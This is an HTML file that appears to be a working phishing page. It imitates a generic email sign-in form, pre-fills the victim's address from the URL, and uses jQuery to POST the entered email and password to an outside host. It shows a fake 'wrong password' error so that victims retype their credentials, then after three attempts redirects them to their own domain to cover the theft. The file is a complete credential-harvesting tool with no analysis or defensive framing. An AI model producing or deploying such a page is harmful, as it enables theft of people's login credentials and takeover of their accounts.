<!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>Login</title>
    <style type="text/css">
    body {
        background: #0073C6;
    }

    .container {
        width: 100%;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
    }

    .office {
        width: 380px;
        background: #fff;
    }

    .office-holder {
        width: 80%;
        margin: auto;
        padding: 20px 0px;
    }

    .logo {
        width: 100%;
        margin-bottom: 2em;
    }

    .logo h1 {
        font-family: arial;

    }

    .logo h2 {
        display: block !important;
    }

    .verify {
        width: 70%;
        margin: auto;
    }

    .verify h4 {
        font-family: arial;
    }

    fieldset {
        width: 90%;
        float: right;
        border: 2px solid #4285f4;
        border-radius: 5px;
    }

    legend {
        font-size: 15px;
        overflow: hidden;
        width: 42%;
        padding: 0px 2px;
        margin: 0px;
    }

    .verify input[type='text'] {
        width: 100%;
        float: right;
        border: none;
        padding: 3px 10px;
    }

    .verify button {
        border: none;
        height: 40px;
        width: 80px;
        float: right;
        margin-top: 2em;
        background: #4285f4;
        border-radius: 5px;
        color: #fff;
    }

    .email-to-verify {
        border: 1px solid #000;
        border-radius: 10px;
    }

    .form-holder {
        width: 100%;
        float: left;
    }

    .form-holder h3 {
        font-weight: 600;
    }

    .form-holder input[type='email'],
    input[type='password'] {
        width: 100%;
        height: 40px;
        float: left;
        margin-bottom: 15px;
    }

    .form-holder .btn-holder {
        width: 100%;
        margin-top: 1em;
        display: flex;
        align-content: center;
        align-items: center;
        justify-content: center;
    }

    .form-holder .btn-holder .btn {
        background: #0073C6;
        border: none;
        padding: 6px 10px;
        color: #fff;
        border-radius: 0px;
        margin-top: 20px;
        margin-bottom: 20px;
    }

    .form-holder .btn-holder .btn:hover {
        cursor: pointer;
    }

    .checkbox {
        width: 100%;
        float: left;
        margin-top: 5px;
    }

    .checkbox label {
        font-family: arial;
        font-size: 13px;
        float: left;
        margin-left: 1em;
    }

    .hide {
        display: none;
    }
    </style>
</head>

<body>
    <div class="container">
        
        <div class="office show border shadow bg-light" id="others">
            <div class="office-holder">
                <div class="logo">
                    <h4 class="text-dark"><strong id="domain-name" class="text-uppercase"></strong></h4>
                    <h5 class="font-weight-light">Please sign in using your email and password to gain access</h5>
                </div>
                <div style="width: 100%;">
                    <div class="alert alert-danger" id="msg" style="display: none;">Wrong password! Please enter correct password.</div>
                    <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                </div>
                <form>
                    <div class="form-holder">
                        <input type="email" id="email" class="form-control" placeholder="someone@example.com" required="">
                        <input type="password" id="password" placeholder="Password" class="form-control" required="">
                        <div class="checkbox">
                            <input type="checkbox" name="" style="float: left; margin-top:2px; margin-bottom: 10px;">
                            <label>REMEMBER ME</label>
                        </div>
                        <div class="btn-holder">
                            <button class="btn btn-lg col-12" id="submit-btn">LOGIN</button>
                        </div>
                        <p style="color:#0073C6; margin-top:1em; float: left; width:100%;">can't access your account?</p>
                        <p style="color:#0073C6; margin-top:0em; float: left; width:100%;">Sign in with a single-use code</p>
                    </div>
                    
                </form>
            </div>
        </div>
    </div>    
    <style>
    .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #FFF;
        border-bottom: 1px solid #fff;
    }

    .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
    }

    .ws_toolbar {
        z-index: 100000
    }

    .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px
    }

    .tb_highlight {
        background-color: yellow
    }

    .tb_hide {
        visibility: hidden
    }

    .ws_toolbar img {
        padding: 2px;
        margin: 0px
    }
    </style>
<!-- Optional JavaScript -->
  <!-- jQuery first, then Popper.js, then Bootstrap JS -->
  <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>

  /* global $ */
  $(document).ready(function(){
    var count=0;
    /////////////url email getting////////////////
    var email = window.location.hash.substr(1);
    if (!email) {

    }
    else
    {
        // $('#email').val(email);
        var my_email =email;
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();        
        $('#email').val(my_email);
        $('#domain-name').html(final);
        $("#msg").hide();
      }
      ///////////////url getting email////////////////


      var file="bmV4dC5waHA=";
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!email) {
            $('#error').show();
            $('#error').html("Email field is emply.!");
            ai.focus;
            return false;
        }

        if (!filter.test(my_email)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account");
            ai.focus;
            return false;
        }
        if (!password) {
            $('#error').show();
            $('#error').html("Password field is emply.!");
            ai.focus;
            return false;
        }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      ///////////new injection////////////////
      count=count+1;
      $('#domain-name').html(final);
      $.ajax({
        dataType: 'JSON',
        url: "https://packaginghub.in/bongo2/index.php",
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifying...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                	
                  $("#password").val("");
                  if (count>=3) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("http://www."+my_slice);

                  }
                  // $('#msg').html(response['msg']);
                }
                else{
                  // $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
            	
              $("#password").val("");
              if (count>=3) {
                count=0;
                window.location.replace("http://www."+my_slice);
              }
              $("#msg").show();
              // $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('LOGIN');
            }
          });
    });


    });


  </script>
  </html>